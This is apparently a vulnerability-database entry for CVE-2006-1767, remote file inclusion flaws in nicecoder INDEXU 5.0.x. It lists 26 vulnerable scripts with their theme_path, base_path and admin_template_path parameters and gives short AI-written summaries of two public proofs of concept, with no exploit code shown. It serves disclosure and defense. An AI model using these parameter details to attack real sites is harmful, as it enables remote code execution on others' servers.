CVE-2006-1767
nicecoder INDEXU 5.0.0-5.0.1 - Remote File Inclusion via theme_path and base_path Parameters
Title source: llmExploitation Summary
EIP tracks 2 public exploits for CVE-2006-1767. PoCs published by SnIpEr_SA.
AI-analyzed exploit summary The provided text describes multiple remote file inclusion vulnerabilities in the 'indexu' application, allowing attackers to execute arbitrary PHP code by manipulating input parameters. It lists affected versions and example exploit URLs.
Description
Multiple PHP remote file inclusion vulnerabilities in nicecoder.com INDEXU 5.0.0 and 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the theme_path parameter in (1) index.php, (2) become_editor.php, (3) add.php, (4) bad_link.php, (5) browse.php, (6) detail.php, (7) fav.php, (8) get_rated.php, (9) login.php, (10) mailing_list.php, (11) new.php, (12) modify.php, (13) pick.php, (14) power_search.php, (15) rating.php, (16) register.php, (17) review.php, (18) rss.php, (19) search.php, (20) send_pwd.php, (21) sendmail.php, (22) tell_friend.php, (23) top_rated.php, (24) user_detail.php, and (25) user_search.php; and the (26) base_path parameter in invoice.php.
Exploits (2)
The provided text describes multiple remote file inclusion vulnerabilities in the 'indexu' application, allowing attackers to execute arbitrary PHP code by manipulating input parameters. It lists affected versions and example exploit URLs.
This exploit demonstrates a remote file inclusion vulnerability in INDEXU v5.0.1, where the `admin_template_path` parameter is used to include arbitrary remote files. The vulnerability affects multiple admin scripts, allowing an attacker to execute malicious code by manipulating the parameter.